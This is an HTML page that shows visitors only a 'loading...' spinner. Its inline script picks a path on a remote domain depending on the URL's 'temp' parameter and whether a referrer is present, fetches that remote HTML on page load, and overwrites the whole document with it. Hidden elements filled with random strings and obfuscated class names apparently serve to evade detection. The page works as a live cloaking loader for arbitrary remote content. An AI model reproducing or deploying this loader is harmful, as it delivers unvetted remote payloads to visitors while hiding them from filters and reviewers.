<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Z7PV6CHxV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Z7PV6CHxV .sVfnuHeqJNs {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Z7PV6CHxV .content {
            line-height: 50px;
            text-align: center
        }

        .Z7PV6CHxV .img {
            width: 100%
        }

        .Z7PV6CHxV .SAxmuu {
            text-align: center
        }

        .Z7PV6CHxV .SAxmuu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Z7PV6CHxV .SAxmuu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Z7PV6CHxV .SAxmuu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Z7PV6CHxV .SAxmuu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Z7PV6CHxV .SAxmuu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Z7PV6CHxV .SAxmuu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Z7PV6CHxV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NxuzwePZH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kURUkz = NxuzwePZH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kURUkz +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kURUkz +".html?a=share";
		}
		
        m5xUo9=url+"#"+new Date().getTime();
        m5xUo9 && function() {
            $.get(m5xUo9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>LmBmXQPpeXlXI16PikNszEOd5AGcTi5J601LCE4GuQs5W7YAbzNjWyhCpyr</p>
<p  style='display:none'>LmBmXQPpeXlXI16PikNszEOd5AGcTi5J601LCE4GuQs5W7YAbzNjWyhCpyr</p>
<a  href='#' style='display:none'>XEhowzUvV4V5CH9kunx2jFlQ</a>
<div style='display:none'>yu0CArolFCwyMyXFgsuodbTKpAiqE4aEjE8wewPo4IbCeoNjl4S8UzvOuv1J0ssXfSx94iA4SnmdzGY4TKCL49VHQfiRMamSWW</div>
<a  href='#' style='display:none'>XEhowzUvV4V5CH9kunx2jFlQ</a>
<li style='display:none' >KLyYMJIBZMajjXgmXk19SHLU2EuE57RZVMDCeGn1</li>
<b style='display:none' >Mj8TXNjQrrw14vodeKReygYllTOBb</b>
<a  href='#' style='display:none'>XEhowzUvV4V5CH9kunx2jFlQ</a>
<li style='display:none' >KLyYMJIBZMajjXgmXk19SHLU2EuE57RZVMDCeGn1</li>
<h1 style='display:none' >UjhfHqM2KrlPR7Ml0t1whP2BX7JP3</h1><div class="Z7PV6CHxV">
    <div class="sVfnuHeqJNs">
        <div class="SAxmuu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>AYvVw1LgbRwD72UytmhNIVdo7b</p>
<li style='display:none' >dp5zv81LMWlpn</li>
<h1 style='display:none' >TkTbj1FCrWP6EKKnW1hH8Wf4UOZ4nZnf0XhErHFb3A5uaE8Y</h1>
<h1 style='display:none' >TkTbj1FCrWP6EKKnW1hH8Wf4UOZ4nZnf0XhErHFb3A5uaE8Y</h1></body>
</html>